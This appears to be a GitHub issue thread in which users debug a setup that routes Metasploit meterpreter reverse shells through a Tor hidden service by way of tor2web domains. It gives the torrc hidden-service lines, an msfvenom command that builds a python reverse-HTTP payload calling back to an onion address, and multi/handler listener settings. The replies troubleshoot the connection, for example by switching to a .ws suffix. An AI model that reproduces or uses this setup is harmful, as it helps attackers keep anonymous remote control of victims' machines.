Manual process

[analyserdmz]

Can you explain the manual process of your script? It seems that I am unable to connect back to the tor hidden service msfconsole, no matter what I try. Can you check the following config and verify you can connect with the same config?

• Create a hidden service domain name with the following addition in torrc

HiddenServiceDir /home/kali/tor_hidden_service/
HiddenServicePort 80 127.0.0.1:5000

• Generate a python stageless http payload, and add ".re" at the end of LHOST (hidden service domain)
  msfvenom -f raw -p python/meterpreter_reverse_http LHOST=do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd.onion.re LPORT=80 > payload_not_clean.py

• Start msfconsole with the following options

use exploit/multi/handler
set payload python/meterpreter_reverse_http
set lport 5000
set lhost 127.0.0.1
set exitonsession false
set sessioncommunicationtimeout 0
set sessionexpirationtimeout 0
exploit -j -z

After debugging of my payload with wireshark, I can see that there is a 301 redirect to HTTPS, resulting to a "bad request".

Any suggestions?

[CalfCrusher]

hello seems all fine to me. I just tried with .ws extension and it works. To me the .ws domains is the more reliable respect others. Please pay attention also that sometimes tor2web doesn't works correctly. And also before launching the payload just do a simple curl to do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd.onion.re (or .ws) to check if all is working.

When you say "After debugging of my payload with wireshark, I can see that there is a 301 redirect to HTTPS, resulting to a "bad request"." maybe the .re exstension is trying to connect to 443, just use .ws

[xSunShine]

i am trying to do same thing manual with but nothing passes throw but when i go to url it says the apache webserver from listner, "it works", my question is can i put in hiddenservice port also 80 at the end and not 5000 for example
hiddenserviceport 80 ip:80? will that work?